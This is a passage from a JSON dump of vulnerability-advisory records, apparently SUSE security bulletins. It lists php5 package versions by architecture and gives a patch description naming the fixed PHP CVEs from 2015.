"php5-pspell", "packageFilename": "php5-pspell-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-pspell-debuginfo", "packageFilename": "php5-pspell-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-ctype", "packageFilename": "php5-ctype-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-xmlrpc-debuginfo", "packageFilename": "php5-xmlrpc-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-xmlwriter", "packageFilename": "php5-xmlwriter-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-zip", "packageFilename": "php5-zip-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-xmlwriter-debuginfo", "packageFilename": "php5-xmlwriter-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-snmp", "packageFilename": "php5-snmp-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}], "description": "This security update of PHP fixes the following issues:\n\n Security issues fixed:\n\n * CVE-2015-4024 [bnc#931421]: Fixed multipart/form-data remote DOS\n Vulnerability.\n * CVE-2015-4026 [bnc#931776]: pcntl_exec() did not check path validity.\n * CVE-2015-4022 [bnc#931772]: Fixed and overflow in ftp_genlist() that\n resulted in a heap overflow.\n * CVE-2015-4021 [bnc#931769]: Fixed memory corruption in\n phar_parse_tarfile when entry filename starts with NULL.\n * CVE-2015-4148 [bnc#933227]: Fixed SoapClient's do_soap_call() type\n confusion after unserialize() information disclosure.\n * CVE-2015-4602 [bnc#935224]: Fixed an incomplete Class unserialization\n type confusion.\n * CVE-2015-4599, CVE-2015-4600, CVE-2015-4601 [bnc#935226]: Fixed type\n confusion issues in unserialize() with various SOAP methods.\n * CVE-2015-4603 [bnc#935234]: Fixed exception::getTraceAsString type\n confusion issue after unserialize.\n * CVE-2015-4644 [bnc#935274]: Fixed a crash in php_pgsql_meta_data.\n * CVE-2015-4643 [bnc#935275]: Fixed an integer overflow in ftp_genlist()\n that could result in a heap overflow.\n * CVE-2015-3411, CVE-2015-3412, CVE-2015-4598 [bnc#935227], [bnc#935232]:\n Added missing null byte checks for paths in various PHP extensions.\n\n Bugs fixed:\n\n * configure php-fpm with --localstatedir=/var [bnc#927147]\n * fix timezone map [bnc#919080]\n\n", "edition": 1, "reporter": "Suse", "published": "2015-07-17T11:08:12", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4601", "CVE-2015-4644", "CVE-2015-4148", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643"], "modified": "2015-07-17T11:08:12", "id": "SUSE-SU-2015:1253-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00027.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:43:58", "references": ["https://bugzilla.suse.com/931776", "https://bugzilla.suse.com/935227", "https://bugzilla.suse.com/935234", "https://bugzilla.suse.com/935232", "https://bugzilla.suse.com/935274", "https://bugzilla.suse.com/935226", "https://bugzilla.suse.com/931421", "https://bugzilla.suse.com/927147", "https://bugzilla.suse.com/935224", "https://bugzilla.suse.com/931769", "https://bugzilla.suse.com/931772", "https://bugzilla.suse.com/935275", "https://bugzilla.suse.com/919080", "https://bugzilla.suse.com/933227"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-gettext-5.5.14-30.1.s390x.rpm", "packageName": "php5-gettext", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-curl-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-curl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-exif-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-exif-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-odbc-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-odbc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-pgsql-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-pgsql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-bz2-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-bz2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-mbstring-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-mbstring-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-intl-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-intl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-5.5.14-30.1.x86_64.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-gd-5.5.14-30.1.x86_64.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-5.5.14-30.1.s390x.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-mbstring-5.5.14-30.1.x86_64.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-gmp-5.5.14-30.1.x86_64.rpm", "packageName": "php5-gmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-pcntl-5.5.14-30.1.x86_64.rpm", "packageName": "php5-pcntl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-pdo-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-pdo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-suhosin-5.5.14-30.1.s390x.rpm", "packageName": "php5-suhosin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-fastcgi-5.5.14-30.1.x86_64.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-iconv-5.5.14-30.1.x86_64.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sockets-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sockets", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-calendar-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-calendar-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-wddx-5.5.14-30.1.s390x.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-json-5.5.14-30.1.s390x.rpm", "packageName": "php5-json", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-intl-5.5.14-30.1.x86_64.rpm", "packageName": "php5-intl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-fileinfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-fileinfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-fileinfo-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-fileinfo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-enchant-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-enchant-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-mysql-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-mysql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-pspell-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-pspell-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sysvsem-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sysvsem", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sysvmsg-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-sysvmsg-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sysvmsg-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sysvmsg-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-bz2-5.5.14-30.1.x86_64.rpm", "packageName": "php5-bz2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "ppc64le", "packageFilename": "php5-devel-5.5.14-30.1.ppc64le.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-gmp-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-gmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-enchant-5.5.14-30.1.s390x.rpm", "packageName": "php5-enchant", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-soap-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-soap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-shmop-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-shmop-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-gettext-5.5.14-30.1.x86_64.rpm", "packageName": "php5-gettext", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-shmop-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-shmop-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-ctype-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-ctype-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-mysql-5.5.14-30.1.s390x.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-soap-5.5.14-30.1.x86_64.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-xsl-5.5.14-30.1.s390x.rpm", "packageName": "php5-xsl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-pcntl-5.5.14-30.1.s390x.rpm", "packageName": "php5-pcntl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-snmp-5.5.14-30.1.s390x.rpm", "packageName": "php5-snmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sysvmsg-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sysvmsg", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sysvsem-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sysvsem-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-ftp-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-ftp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sqlite-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-sqlite-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-ftp-5.5.14-30.1.s390x.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-curl-5.5.14-30.1.s390x.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-debugsource-5.5.14-30.1.s390x.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-odbc-5.5.14-30.1.s390x.rpm", "packageName": "php5-odbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-zlib-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-zlib-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-fpm-5.5.14-30.1.x86_64.rpm", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-snmp-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-snmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-pspell-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-pspell-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-ftp-5.5.14-30.1.x86_64.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-wddx-5.5.14-30.1.x86_64.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-enchant-5.5.14-30.1.x86_64.rpm", "packageName": "php5-enchant", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-pcntl-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-pcntl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-mcrypt-5.5.14-30.1.s390x.rpm", "packageName": "php5-mcrypt", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-dom-5.5.14-30.1.s390x.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-fileinfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-fileinfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-sockets-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-sockets-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-enchant-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-enchant-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-dom-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-dom-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-gd-5.5.14-30.1.s390x.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-gd-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-gd-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-exif-5.5.14-30.1.s390x.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-ctype-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-ctype-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-calendar-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-calendar-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-curl-5.5.14-30.1.x86_64.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-intl-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-intl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-tokenizer-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-tokenizer-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sqlite-5.5.14-30.1.s390x.rpm", "packageName": "php5-sqlite", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-gettext-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-gettext-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-soap-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-soap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-openssl-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-openssl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-dba-5.5.14-30.1.s390x.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-calendar-5.5.14-30.1.s390x.rpm", "packageName": "php5-calendar", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-ctype-5.5.14-30.1.x86_64.rpm", "packageName": "php5-ctype", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-iconv-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-iconv-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-mcrypt-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-mcrypt-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-sysvsem-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-sysvsem-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-ldap-debuginfo-5.5.14-30.1.s390x.rpm", "packageName": "php5-ldap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-bcmath-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-bcmath-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-xmlwriter-5.5.14-30.1.x86_64.rpm", "packageName": "php5-xmlwriter", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-zip-5.5.14-30.1.s390x.rpm", "packageName": "php5-zip", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-dba-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-dba-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-xmlreader-5.5.14-30.1.x86_64.rpm", "packageName": "php5-xmlreader", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-pdo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "x86_64", "packageFilename": "php5-xsl-debuginfo-5.5.14-30.1.x86_64.rpm", "packageName": "php5-xsl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": "php5-fpm-5.5.14-30.1.s390x.rpm", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "arch": "s390x", "packageFilename": 